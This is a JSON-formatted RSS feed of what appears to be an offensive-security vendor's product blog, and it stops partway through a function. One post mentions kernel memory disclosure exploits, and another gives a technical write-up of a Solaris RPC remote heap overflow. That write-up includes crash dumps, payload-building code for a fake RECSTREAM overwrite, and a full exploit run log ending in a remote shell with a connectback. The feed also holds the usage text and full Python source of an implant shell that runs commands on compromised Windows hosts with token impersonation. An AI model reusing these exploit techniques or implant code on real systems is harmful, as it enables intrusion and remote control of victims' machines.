{"rss":{"$":{"xmlns:atom":"http://www.w3.org/2005/Atom","xmlns:openSearch":"http://a9.com/-/spec/opensearchrss/1.0/","xmlns:blogger":"http://schemas.google.com/blogger/2008","xmlns:georss":"http://www.georss.org/georss","xmlns:gd":"http://schemas.google.com/g/2005","xmlns:thr":"http://purl.org/syndication/thread/1.0","version":"2.0"},"channel":[{"atom:id":["tag:blogger.com,1999:blog-7337853103195839314"],"lastBuildDate":["Wed, 06 Mar 2024 07:33:45 +0000"],"category":["CANVAS","silica","El Jefe","infiltrate","innuendo","mosdef","routers","swarm","CVE-2013-0640","Java","WPS","adobe","stalker","training","wireless"],"title":["Immunity Products"],"description":[""],"link":["https://immunityproducts.blogspot.com/"],"managingEditor":["noreply@blogger.com (Dave Aitel)"],"generator":["Blogger"],"openSearch:totalResults":["62"],"openSearch:startIndex":["1"],"openSearch:itemsPerPage":["25"],"item":[{"guid":[{"_":"tag:blogger.com,1999:blog-7337853103195839314.post-1657969705329572559","$":{"isPermaLink":"false"}}],"pubDate":["Tue, 13 Nov 2018 17:43:00 +0000"],"atom:updated":["2018-11-14T05:02:11.661-08:00"],"title":["Recent kernel memory disclosure bugs in CANVAS"],"description":["In July 2017, a blogpost from Anders Fogh introduced the idea of leaking kernel memory from the unprivileged userland. This was later followed by the public introduction of both Spectre and Meltdown and their corresponding coverage in the media. For Immunity this was the perfect opportunity to not only write two Spectre exploits for CANVAS (the Windows version being CEU only) but also a framework dedicated to this vulnerability class. In particular we also wrote CANVAS exploits for CVE-2017-18344 and CVE-2018-14656 . Some of our exploitation notes have been published on the Immunity website:
\n\nPart 1: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_1.pdf
\nPart 2: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_2.pdf
\n"],"link":["https://immunityproducts.blogspot.com/2018/11/recent-kernel-memory-disclosure-bugs-in.html"],"author":["noreply@blogger.com (Unknown)"],"thr:total":["0"],"text_description":"In July 2017, a blogpost from Anders Fogh introduced the idea of leaking kernel memory from the unprivileged userland. This was later followed by the public introduction of both Spectre and Meltdown and their corresponding coverage in the media. For Immunity this was the perfect opportunity to not only write two Spectre exploits for CANVAS (the Windows version being CEU only) but also a framework dedicated to this vulnerability class. In particular we also wrote CANVAS exploits for CVE-2017-18344 and CVE-2018-14656 . Some of our exploitation notes have been published on the Immunity website:\n\nPart 1: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_1.pdf\nPart 2: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_2.pdf\n"},{"guid":[{"_":"tag:blogger.com,1999:blog-7337853103195839314.post-2874883352312700994","$":{"isPermaLink":"false"}}],"pubDate":["Mon, 10 Jul 2017 20:12:00 +0000"],"atom:updated":["2017-07-11T14:20:25.813-07:00"],"title":[""],"description":["
\nbash-3.00# /opt/csw/bin/gdb /usr/sbin/rpc.metamhd core\nGNU gdb (GDB) 7.7\n[...]\nReading symbols from /usr/sbin/rpc.metamhd...(no debugging symbols found)...done.\n[New LWP 1]\n[New LWP 2]\n[Thread debugging using libthread_db enabled]\n[New Thread 1 (LWP 1)]\n[New Thread 2 (LWP 2)]\nCore was generated by `/usr/sbin/rpc.metamhd'.\nProgram terminated with signal SIGSEGV, Segmentation fault.\n#0  0xd0efe2cc in xdr_replymsg () from /lib/libnsl.so.1\n(gdb) bt\n#0  0xd0efe2cc in xdr_replymsg () from /lib/libnsl.so.1\n#1  0xd0f0c09e in svc_vc_reply () from /lib/libnsl.so.1\n#2  0xd0f03c47 in svcerr_noprog () from /lib/libnsl.so.1\n#3  0xd0f040fa in _svc_prog_dispatch () from /lib/libnsl.so.1\n#4  0xd0f08bfc in _svc_run_mt () from /lib/libnsl.so.1\n#5  0xd0f08473 in svc_run () from /lib/libnsl.so.1\n#6  0x08057094 in main ()\n(gdb) print /x $ecx\n$1 = 0x450685ec                                        <-- 0x450685ec was read from the network buffer\n(gdb) x/6i $pc\n=> 0xd0efe2cc <xdr_replymsg+75>:  mov    0x18(%ecx),%ecx   <-- control of %ecx is possible\n   0xd0efe2cf <xdr_replymsg+78>:  add    $0x18,%eax\n   0xd0efe2d2 <xdr_replymsg+81>:  push   %eax\n   0xd0efe2d3 <xdr_replymsg+82>:  push   %edi\n   0xd0efe2d4 <xdr_replymsg+83>:  call   *%ecx             <-- If %ecx can be controlled, %EIP can be set.\n   0xd0efe2d6 <xdr_replymsg+85>:  add    $0x8,%esp\n(gdb)\n
\n[...]\n    area = (struct area *)rqst->rq_clntcred;\n    aup = &area->area_aup;\n[...]\n    gid_len = IXDR_GET_U_INT32(buf);        // reads the gid_len (unsigned) on the network\n    if (gid_len > NGRPS_LOOPBACK) {         // security check\n        stat = AUTH_BADCRED;\n        goto done;\n    }\n    aup->aup_len = gid_len;\n    for (i = 0; i < gid_len; i++) {\n        aup->aup_gids[i] = (gid_t)IXDR_GET_INT32(buf);\n    }\n
\nSVCXPRT *\nsvc_xprt_alloc(void)\n{\n[..]\n    if ((cred_area = malloc(2*MAX_AUTH_BYTES + RQCRED_SIZE)) == NULL)\n        goto err_exit;\n    xt->cred_area = cred_area;\n[...]\n    return (xprt);\nerr_exit:\n    svc_xprt_free(xprt);\n    return (NULL);\n}\n
\nvoid\nsvc_getreq_common(const int fd)\n{\n    SVCXPRT *xprt;\n    enum xprt_stat stat;\n    struct rpc_msg *msg;\n    struct svc_req *r;\n    char *cred_area;\n\n[...]\n    if ((fd >= nsvc_xports) || (xprt = svc_xports[fd]) == NULL) {   // [L1]\n        (void) rw_unlock(&svc_fd_lock);\n        return;\n    }\n[...]\n    r = SVCEXT(xprt)->req;                                           // [L2]\n[...]\n    cred_area = SVCEXT(xprt)->cred_area;\n    msg->rm_call.cb_cred.oa_base = cred_area;\n    msg->rm_call.cb_verf.oa_base = &(cred_area[MAX_AUTH_BYTES]);\n    r->rq_clntcred = &(cred_area[2 * MAX_AUTH_BYTES]);              // [L3]\n
\n.text:00044166    push    24h ; '$'       ; size\n.text:00044168    call    _malloc\n.text:0004416D    add     esp, 4\n.text:00044170    test    eax, eax\n.text:00044172    jz      short loc_441A7\n.text:00044174    mov     [edi+0Ch], eax\n.text:00044177    push    4B0h            ; size  <-- 1200 bytes\n.text:0004417C    call    _malloc\n.text:00044181    add     esp, 4\n.text:00044184    test    eax, eax\n
\n.text:0004464E    push    24h ; '$'       ; size\n.text:00044650    call    _malloc\n.text:00044655    add     esp, 4\n.text:00044658    test    eax, eax\n.text:0004465A    jz      short loc_4468F\n.text:0004465C    mov     [edi+0Ch], eax\n.text:0004465F    push    538h            ; size  <-- 1336 bytes\n.text:00044664    call    _malloc\n.text:00044669    add     esp, 4\n.text:0004466C    test    eax, eax\n
\nbash-3.2# cat /var/adm/messages|grep maintenance\nJun 13 11:42:34 Host-001 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)\nJun 14 08:10:28 Host-002 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)\nJun 14 08:14:08 Host-002 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)\nJun 14 08:34:33 Host-002 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)\nbash-3.2# svcs -xv\nsvc:/application/print/server:default (LP print server)\n State: disabled since Wed Jun 14 08:15:58 2017\nReason: Disabled by an administrator.\n   See: http://sun.com/msg/SMF-8000-05\n   See: man -M /usr/share/man -s 1M lpsched\nImpact: 2 dependent services are not running:\n        svc:/application/print/rfc1179:default\n        svc:/application/print/ipp-listener:default\n\nsvc:/network/rpc/bootparams:default (boot parameter server)\n State: maintenance since Wed Jun 14 08:34:33 2017\nReason: Restarting too quickly.\n   See: http://sun.com/msg/SMF-8000-L5\n   See: man -M /usr/share/man -s 1M rpc.bootparamd\n   See: /var/svc/log/network-rpc-bootparams:default.log\nImpact: This service is not running.\nbash-3.2#\n
\nbash-3.00# pmap core*|grep ld|grep 160K\nD13C4000     160K r-x--  /lib/ld.so.1\nD0FC4000     160K r-x--  /lib/ld.so.1\nD0FC4000     160K r-x--  /lib/ld.so.1\nD13C4000     160K r-x--  /lib/ld.so.1\nD0FC4000     160K r-x--  /lib/ld.so.1\nD0FC4000     160K r-x--  /lib/ld.so.1\nD13C4000     160K r-x--  /lib/ld.so.1\n
\npattern += struct.pack('>L', 0x200)          # t_s +0\npattern += struct.pack('>L', 0)\npattern += struct.pack('>L', self.where)     # t_p +8\npattern += struct.pack('>L', 0)\npattern += struct.pack('>L', 0xffffffff)     # t_l +16\npattern += struct.pack('>L', 0)\npattern += struct.pack('>L', 0)              # t_r +24\npattern += struct.pack('>L', 0)\npattern += struct.pack('>L', self.what)      # t_n +32  # Must be writable!\npattern += struct.pack('>L', 0)\n
\ntypedef struct rec_strm {\n    caddr_t tcp_handle;\n[...]\n    int (*writeit)();\n    caddr_t out_base;        /* output buffer (points to frag header) */\n    caddr_t out_finger;      /* next output position */\n    caddr_t out_boundry;     /* data cannot up to this address */\n    uint32_t *frag_header;   /* beginning of current fragment */\n    bool_t frag_sent;        /* true if buffer sent in middle of record */\n[...]\n    int (*readit)();\n    caddr_t in_base;         /* input buffer */\n    caddr_t in_finger;       /* location of next byte to be had */\n    caddr_t in_boundry;      /* can read up to this location */\n    int fbtbc;               /* fragment bytes to be consumed */\n    bool_t last_frag;\n    uint_t sendsize;\n    uint_t recvsize;\n[...]\n    uint_t firsttime;\n[...]\n    uint_t in_nonblock;      /* non-blocked input */\n    uint_t in_needpoll;      /* need to poll to get more data ? */\n    uint32_t in_maxrecsz;    /* maximum record size */\n    caddr_t in_nextrec;      /* start of next record */\n    uint32_t in_nextrecsz;   /* part of next record in buffer */\n} RECSTREAM;\n
\n#define AT_SUN_UID      2000    /* effective user id */\n#define AT_SUN_RUID     2001    /* real user id */\n#define AT_SUN_GID      2002    /* effective group id */\n#define AT_SUN_RGID     2003    /* real group id */\n[...]\n#define AT_SUN_LDELF    2004    /* dynamic linker's ELF header */\n#define AT_SUN_LDSHDR   2005    /* dynamic linker's section headers */\n#define AT_SUN_LDNAME   2006    /* name of dynamic linker */\n#define AT_SUN_LPAGESZ  2007    /* large pagesize */\n[...]\n#define AT_SUN_MMU      2015    /* mmu module name */\n#define AT_SUN_LDDATA   2016    /* dynamic linkers data segment */\n
\n80760ae:  8b e5    mov    %ebp,%esp    ; stack is controlled\n80760b0:  5d       pop    %ebp         ; therefore the next\n80760b1:  c3       ret                 ; pop are controlled.\n
\n2017-06-26 17:50:36,532 [ exploitutils.py] - INFO - Discovered interfaces:\n2017-06-26 17:50:36,532 [ exploitutils.py] - INFO - - ['lo', '127.0.0.1', '255.0.0.0']\n2017-06-26 17:50:36,532 [ exploitutils.py] - INFO - - ['enp0s3-ipv6', 'fe80::61:853c:fa1b:3af6:76', 'ffff:ffff:ffff:ffff::']\n[...]\n2017-06-26 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - OS detected: Solaris ['10', '11']\n2017-06-26 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - >>> Method #1: Attempting to exploit bootparam\n2017-06-26 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Checking if bootparam is available\n2017-06-26 17:50:36,663 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK\n2017-06-26 17:50:36,664 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Expecting an u10 version\n2017-06-26 17:50:36,664 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Testing x86 target\n2017-06-26 17:50:37,430 [ solaris_rpc_libnsl_ng2.py] - INFO - Waiting 2.00 sec\n2017-06-26 17:50:40,540 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Testing amd64 target\n2017-06-26 17:50:41,259 [ solaris_rpc_libnsl_ng2.py] - INFO - Waiting 2.00 sec\n2017-06-26 17:50:44,370 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Starting the generic attack\n2017-06-26 17:50:44,371 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the \"leaky\"'s RECSTREAM object\n2017-06-26 17:50:44,371 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying the ultra-fast range\n2017-06-26 17:50:46,362 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] RECSTREAM object is at: 0x080ae080\n2017-06-26 17:50:48,352 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.tcp_handle = 0x080ad8b0\n2017-06-26 17:50:48,354 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.writeit = 0xfef3bdf4\n2017-06-26 17:50:48,355 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.out_base = 0x080ae000\n2017-06-26 17:50:48,355 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.out_finger = 0x080ae104\n2017-06-26 17:50:48,356 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.out_boundry = 0x080b0408\n2017-06-26 17:50:48,357 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.frag_header = 0x080ae0e0\n2017-06-26 17:50:48,357 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.frag_sent = 0\n2017-06-26 17:50:48,358 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.readit = 0x00000000\n2017-06-26 17:50:48,358 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_base = 0x080b0410\n2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_finger = 0x080b13b0\n2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_boundry = 0x080b13b0\n2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.fbtbc = 0\n2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.last_frag = 1\n2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.sendsize = 9000 [0x00002328]\n2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.recvsize = 4000 [0x00000fa0]\n2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.firsttime = 0\n2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_nonblock = 0\n2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_needpoll = 1\n2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_maxrecsz = 0\n2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_nextrec = 0x080b0410\n2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_nextrecsz = 0\n2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the associated 'XDR' object and the place to store a fake RECSTREAM\n2017-06-26 17:50:50,361 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found the XDR object at 0x080adec4:\n2017-06-26 17:50:50,362 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_op = 0\n2017-06-26 17:50:50,363 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_ops = 0xfef88998\n2017-06-26 17:50:50,364 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_public = 0x00000000\n2017-06-26 17:50:50,364 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_private = 0x080ae080 [RECSTREAM object]\n2017-06-26 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_base = 0x00000000\n2017-06-26 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_handy = 0\n2017-06-26 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found the perfect place to store our fake RECSTREAM: 0x080ada00\n2017-06-26 17:50:50,366 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] libnsl is loaded at 0xfef80000\n2017-06-26 17:50:50,366 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the ret2ld payload\n2017-06-26 17:50:57,920 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Found the payload!\n2017-06-26 17:50:57,922 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found ret2addr payload at 0x080aa828\n2017-06-26 17:50:57,923 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the STACK\n2017-06-26 17:50:57,923 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08046000, 0x080467ff]\n2017-06-26 17:50:59,811 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 2048 bytes at 08046000\n2017-06-26 17:51:00,314 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08046800, 0x08046fff]\n2017-06-26 17:51:02,198 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 2048 bytes at 08046800\n2017-06-26 17:51:02,700 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047000, 0x080477ff]\n2017-06-26 17:51:04,590 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 2048 bytes at 08047000\n2017-06-26 17:51:05,092 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047800, 0x08047bff]\n2017-06-26 17:51:06,989 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 1024 bytes at 08047800\n2017-06-26 17:51:07,491 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047c00, 0x08047dff]\n2017-06-26 17:51:09,387 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 512 bytes at 08047c00\n2017-06-26 17:51:09,889 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047e00, 0x08047e7f]\n2017-06-26 17:51:11,778 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 128 bytes at 08047e00\n2017-06-26 17:51:12,280 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047e80, 0x08047eff]\n2017-06-26 17:51:14,167 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 128 bytes at 08047e80\n2017-06-26 17:51:14,670 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f00, 0x08047f1f]\n2017-06-26 17:51:16,556 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f00\n2017-06-26 17:51:17,059 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f20, 0x08047f3f]\n2017-06-26 17:51:18,946 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f20\n2017-06-26 17:51:19,449 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f40, 0x08047f5f]\n2017-06-26 17:51:21,337 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f40\n2017-06-26 17:51:21,839 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f60, 0x08047f7f]\n2017-06-26 17:51:23,727 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f60\n2017-06-26 17:51:24,229 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Analyzing the stack [0x08046000, 0x08047f7f]\n2017-06-26 17:51:24,252 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found LD_DATA at 0xfeffb000\n2017-06-26 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found our target FP copy at 0x08047d04\n2017-06-26 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - The infoleak is a success, let's try to get the shell now!\n2017-06-26 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - Trying first with saved_ebp = 08047d04\n2017-06-26 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Got a shell!\n2017-06-26 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Solaris libnsl (RPC) - Remote Heap Overflow attacking 192.168.1.147:33583 (succeeded!)\n2017-06-26 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Solaris libnsl (RPC) - Remote Heap Overflow done (Success!)\n2017-06-26 17:51:26,188 [ exploitutils.py] - INFO - done -- connectback set to 192.168.1.186:5555\n
usage: shell.py [-h] [-c COMMAND] [--no-cache] [--token-user TOKEN_USER]\n [--token-luid TOKEN_LUID] [-p PROMPT] [-u URL]\n process_implant_id\n\nCommand-line interface to an INNUENDO implant target shell.\n\nNOTE: The \"process_implant_id\" argument refers to the hash ID listed for an\nimplant in the process_list. Not to be confused with the PID.\n\n $ ./rpc.py process_list\n Machine: <machine_id>\n Node: <node_id>\n <process_implant_id> | synced | ...\n\npositional arguments:\n process_implant_id the ID of the implant process to target\n\noptional arguments:\n -h, --help show this help message and exit\n -c COMMAND, --command COMMAND\n execute a command then exit\n --no-cache do not use cached data for initialization\n --token-user TOKEN_USER\n attempt impersonation of a \"[domain\\]user\"\n --token-luid TOKEN_LUID\n sets a token LUID for impersonation\n -p PROMPT, --prompt PROMPT\n a windows prompt format string\n -u URL, --url URL rpc server url\n
\n$ ./rpc.py process_list \nMachine: 96e41afa2cfbe7b26d3b5c397abb2b8f5198bdb3\n Node: c8aaddbc059b40f4a3f7d61945cb2684\n b850bef0abe4417debc273c640be7e58 | synced | 2016-12-14 13:31:47 | boot64.exe (1572)\n Node: nt authority\\system\n de1014f777018dffd21678d2e7a3f5c0 | synced | 2016-12-14 13:31:50 | netclassmon.exe (1864)\n
\n$ python -m examples.rpc.shell de1014f777018dffd21678d2e7a3f5c0\ninitializing ...\nMicrosoft Windows [Version 6.1.7601]\n\nC:\\Windows\\system32> whoami\nnt authority\\system\nC:\\Windows\\system32> exit\n
\n$ python -m examples.rpc.shell de1014f777018dffd21678d2e7a3f5c0 --token-user immunity\ninitializing ...\nMicrosoft Windows [Version 6.1.7601]\n\nC:\\Windows\\system32> whoami\nbunny\\immunity\n
\nC:\\Windows\\system32> cd c:\\users\\administrator\nAccess is denied.\nC:\\Windows\\system32> cd c:\\users\\immunity\nc:\\Users\\immunity> dir\n Volume in drive C has no label.\n Volume Serial Number is 883B-C53C\n\n Directory of c:\\Users\\immunity\n\n12/19/2013 05:11 PM <DIR> .\n12/19/2013 05:11 PM <DIR> ..\n12/19/2013 05:11 PM <DIR> Contacts\n07/13/2016 10:46 AM <DIR> Desktop\n12/19/2013 05:11 PM <DIR> Documents\n12/20/2013 12:14 PM <DIR> Downloads\n12/19/2013 05:11 PM <DIR> Favorites\n12/19/2013 05:11 PM <DIR> Links\n12/19/2013 05:11 PM <DIR> Music\n12/19/2013 05:11 PM <DIR> Pictures\n12/19/2013 05:11 PM <DIR> Saved Games\n12/19/2013 05:11 PM <DIR> Searches\n12/19/2013 05:11 PM <DIR> Videos\n 0 File(s) 0 bytes\n 13 Dir(s) 54,171,832,320 bytes free\nc:\\Users\\immunity>\n
\ntry:\n    import readline\nexcept ImportError:\n    pass\n
\nPROMPT = '$p$g$s'\nTAG_ENV = 'shell:environment'\nTAG_META = 'shell:metadata'\n
\n    def repl(self):\n        \"\"\"The Read-Eval-Print Loop.\"\"\"\n
\n        while True:\n            prompt = self.parse_prompt()\n            oper_id = None\n            try:\n                line = raw_input(prompt).strip()\n
\n oper_id = self.execute(line, wait=wait)\n
\n            search = ' '.join([TAG_ENV, token_tag, self.proc_id])\n            res = c.operation_list(search=search, limit=1)\n            if res['records']:\n                oper = res['records'][0]\n                self.check_error(oper)\n                self.env = c.operation_attributes(oper['id'])['env']\n
\n            oper_id = c.operation_execute('recon', 'environment', self.proc_id)[0]\n            self.check_error(c.operation_wait(oper_id)[0])\n\n            self.env = c.operation_attributes(oper_id)['env']\n\n            c.operation_tag_add(TAG_ENV, oper_id)\n            c.operation_tag_add(token_tag, oper_id)\n
\n command = 'cd /D %s && %s' % (self.cwd, command)\n
\n tag = ':'.join(['cmd', command.split(None, 1)[0]])\n
\n res = c.operation_execute('filemanager', 'execute', self.proc_id, args=args)\n c.operation_tag_add(tag, res[0])\n
\n#! /usr/bin/env python\n\n\"\"\"\nCommand-line interface to an INNUENDO implant target shell.\n\"\"\"\n\nimport re\nimport sys\nimport ntpath\ntry:\n    import readline\nexcept ImportError:\n    pass\n\nimport rpc\n\nPROMPT = '$p$g$s'\nTAG_ENV = 'shell:environment'\nTAG_META = 'shell:metadata'\n\nrx_prompt = re.compile(r'[$](.)')\n\nclass Shell(object):\n    def __init__(self, client, proc_id, token_user=None, token_luid=None, prompt=None):\n        self.client = client\n        self.proc_id = proc_id\n        self.env = None\n        self.ver = None\n        self.cwd = None\n        self.token_user = token_user\n        self.token_luid = token_luid\n        self.prompt = prompt\n\n    def repl(self):\n        \"\"\"The Read-Eval-Print Loop.\"\"\"\n        c = self.client\n\n        print self.ver\n        print\n\n        while True:\n            prompt = self.parse_prompt()\n            oper_id = None\n            try:\n                line = raw_input(prompt).strip()\n                if not line:\n                    continue\n                if line.lower() == 'exit':\n                    break\n                if line.lower().startswith('cd'):\n                    try:\n                        path = line.split(' ', 1)[1].strip()\n                    except IndexError:\n                        pass\n                    else:\n                        self.chdir(path)\n                    continue\n                wait = line[-1] != '&'\n\n                oper_id = self.execute(line, wait=wait)\n                if wait:\n                    self.wait(oper_id)\n                    print self.output(oper_id)\n\n            except EOFError:\n                break\n            except KeyboardInterrupt:\n                print\n                continue\n\n    def setup(self, cached=True):\n        \"\"\"Collect metadata used to format the shell.\n\n        Uses existing operations when *cached* is `True`.\n        \"\"\"\n        c = self.client\n\n        # if the luid is set, it takes precedence\n        token_tag = ':'.join(['token', self.token_luid or self.token_user or 'none'])\n\n        if cached:\n            # check past ops\n            search = ' '.join([TAG_META, token_tag, self.proc_id])\n            res = c.operation_list(search=search, limit=1)\n            if res['records']:\n                oper = res['records'][0]\n                self.check_error(oper)\n                self.ver, self.cwd = self.output(oper['id']).strip().splitlines()\n\n            search = ' '.join([TAG_ENV, token_tag, self.proc_id])\n            res = c.operation_list(search=search, limit=1)\n            if res['records']:\n                oper = res['records'][0]\n                self.check_error(oper)\n                self.env = c.operation_attributes(oper['id'])['env']\n\n        if not self.cwd:\n            oper_id = self.execute('ver && cd')\n            self.check_error(self.wait(oper_id))\n\n            self.ver, self.cwd = self.output(oper_id).strip().splitlines()\n\n            c.operation_tag_add(TAG_META, oper_id)\n            c.operation_tag_add(token_tag, oper_id)\n\n        if not self.env:\n            oper_id = c.operation_execute('recon', 'environment', self.proc_id)[0]\n            self.check_error(c.operation_wait(oper_id)[0])\n\n            self.env = c.operation_attributes(oper_id)['env']\n\n            c.operation_tag_add(TAG_ENV, oper_id)\n            c.operation_tag_add(token_tag, oper_id)\n\n    def execute(self, command, wait=True):\n        \"\"\"Executes a command on the targets and returns the operation ID.\"\"\"\n        c = self.client\n\n        tag = ':'.join(['cmd', command.split(None, 1)[0]])\n        if self.cwd:\n            command = 'cd /D %s && %s' % (self.cwd, command)\n        args = {\n            'path': command,\n            'shell': True,\n            'output_capture': True,\n        }\n        if not wait:\n            args['output_capture'] = False\n            args['wait'] = False\n        if self.token_user:\n            args['token_domain_user'] = self.token_user\n        if self.token_luid:\n            args['token_luid'] = self.token_luid\n\n        res = c.operation_execute('filemanager', 'execute', self.proc_id, args=args)\n        c.operation_tag_add(tag, res[0])\n        return res[0]\n\n    def wait(self, oper_id):\n        \"\"\"Waits for *oper_id* to complete and returns the operation.\n\n        If a `KeyboardInterrupt` is caught while waiting for the operation,\n        the operation will be cancelled, and any processes it started will be\n        killed.\n        \"\"\"\n        c = self.client\n\n        try:\n            return c.operation_wait(oper_id)[0]\n        except KeyboardInterrupt:\n            res = c.operation_attributes(oper_id)\n            if res['process_id']:\n                print 'killing tree: %(process_id)s' % res\n                self.kill(res['process_id'])\n            c.operation_cancel(oper_id)\n            print\n            raise\n\n    def output(self, oper_id):\n        \"\"\"Returns a string containing the stdout and stderr of *oper_id*.\"\"\"\n        c = self.client\n\n        out = []\n        attrs = c.operation_attributes(oper_id)\n\n        stdout = attrs['stdout']\n        stderr = attrs['stderr']\n        if stdout:\n            out.append(stdout.rstrip())\n        if stderr:\n            out.append(stderr.rstrip())\n\n        return '\\n'.join(out)\n\n    def check_error(self, oper):\n        \"\"\"Exits the program if *oper* contains an error.\"\"\"\n        if not oper['success']:\n            sys.exit('\\n'.join([oper['error'], oper['exception']]))\n\n    def kill(self, pid, recurse=True):\n        \"\"\"Kills the process with *pid* on the target.\"\"\"\n        c = self.client\n        return c.operation_execute('manager', 'terminate', self.proc_id, args={\n            'process_id': pid, 'recurse': recurse,\n        })\n\n    def chdir(self, path):\n        \"\"\"Changes the current working directory.\n\n        The target is first checked to verify that *path* is valid.\n        \"\"\"\n        c = self.client\n\n        oper_id = self.execute('cd /D %s && cd' % path)\n        attrs = c.operation_attributes(oper_id)\n        output = self.output(oper_id)\n\n        # set the new cwd if the command succeeded\n        if attrs['return_code'] == 0:\n            self.cwd = output\n        else:\n            print output\n\n    def parse_prompt(self):\n        \"\"\"Returns a Windows prompt with codes substituted with their respective\n        values.\n\n        Not supported: $+, $M\n        \"\"\"\n        prompt = self.env.get('PROMPT', PROMPT) if self.prompt is None else self.prompt\n        result = []\n        for match in rx_prompt.finditer(prompt):\n            code = match.group(1).lower()\n            result.append({\n                'a': '&',\n                